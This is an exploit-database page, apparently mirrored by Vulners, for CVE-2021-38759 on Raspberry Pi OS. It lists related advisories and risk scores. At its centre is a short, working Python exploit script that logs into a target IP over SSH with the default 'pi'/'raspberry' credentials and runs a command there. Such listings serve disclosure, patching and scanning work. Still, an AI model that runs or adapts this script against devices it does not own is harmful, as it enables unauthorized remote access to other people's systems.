Lucene search
K

Raspberry Pi 5.10 - Default Credentials

🗓️ 09 Dec 2021 00:00:00Reported by netspookyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 367 Views

Raspberry Pi 5.10 Default Credentials exploit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Raspberry Pi 5.10 - Default Credentials Vulnerability
9 Dec 202100:00
zdt
Circl
CVE-2021-38759
8 Dec 202100:23
circl
CNNVD
Raspberry Pi Os安全漏洞
7 Dec 202100:00
cnnvd
CVE
CVE-2021-38759
7 Dec 202120:51
cve
Cvelist
CVE-2021-38759
7 Dec 202120:51
cvelist
NVD
CVE-2021-38759
7 Dec 202121:15
nvd
OpenVAS
Raspberry Pi OS / Raspbian Default Credentials (SSH)
9 Dec 202100:00
openvas
OSV
CVE-2021-38759
7 Dec 202121:15
osv
Packet Storm
Raspberry Pi 5.10 Default Credentials
9 Dec 202100:00
packetstorm
Prion
Default credentials
7 Dec 202121:15
prion
Rows per page
# Exploit Title: Raspberry Pi 5.10 - Default Credentials
# Date: 08/12/2021
# Exploit Author: netspooky
# Vendor Homepage: https://www.raspberrypi.com/
# Software Link: https://www.raspberrypi.com/software/operating-systems/
# Version: Raspberry Pi OS <= 5.10
# Tested on: Raspberry Pi OS 5.10
# CVE : CVE-2021-38759

# Initial Release: https://twitter.com/netspooky/status/1468603668266209280

# Run: $ python3 exploit.py IP

import paramiko

import sys

h=sys.argv[1]

u="pi"

p="raspberry"

c=paramiko.client.SSHClient()

c.set_missing_host_key_policy(paramiko.AutoAddPolicy())

c.connect(h,username=u,password=p)

i,o,e=c.exec_command("id")

print(o.read())

c.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Dec 2021 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.29732
367